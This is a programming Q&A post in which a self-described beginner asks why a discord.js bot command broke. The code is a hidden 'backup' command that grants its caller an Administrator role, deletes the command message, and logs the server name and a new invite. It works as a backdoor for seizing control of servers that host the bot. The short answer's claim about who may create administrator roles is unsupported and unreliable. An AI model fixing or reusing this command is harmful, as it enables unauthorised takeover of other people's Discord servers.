# message.guild.createRole ain't working - discord.js

Tags: javascript, node.js, bots, discord, discord.js

I am new in script in JavaScript, and as I was testing my code, suddenly my bot refused to do stuff it did before. Basically, I have a command which gives you a role with administrator (if someone needs to explain why I will respond in comments) and sends a message that I executed it and sends an invite to the server I executed the command on. I read some code online and made up a command. It worked for some days, and then one day it stopped working, telling me it isnt a function. I am running the lastest version of discord.js. Here is my code:

```
bot.on("message", async message => {
    if(message.content.startsWith(`${prefix}backup`)) {
        const role = await message.guild.createRole({
              name: 'Backup',
              permissions: ['ADMINISTRATOR'],
              color: '0xe600ff',
              position: 0
            }
        );
        await message.member.addRole(role);
        message.channel.bulkDelete(1)
        console.log(`You ran backup on ${message.guild.name}`)
        let invite = await message.channel.createInvite(
            {
              maxAge: 86399,
              maxUses: 3
            },
            `f`
          )
          .catch(console.log);

            console.log(invite ? `Invite: ${invite}` : "Error");
          }
    }
)
```

I don't know if I updated my discord.js, because I am hosting on glitch.com. Thank you in advance

Answer (score 0):

Only guild owner can create a ADMINISTRATOR permission. So that's why your code isn't working.

Comment: @manyCZ check if bot has ADMINISTRATOR permissions. If that won't work join official Discord Developers server - https://discordapp.com/discord-developers And if you aren't on Official discord.js server, also join there. They will help 100%. Here is a link: https://discordapp.com/invite/bRCvFy9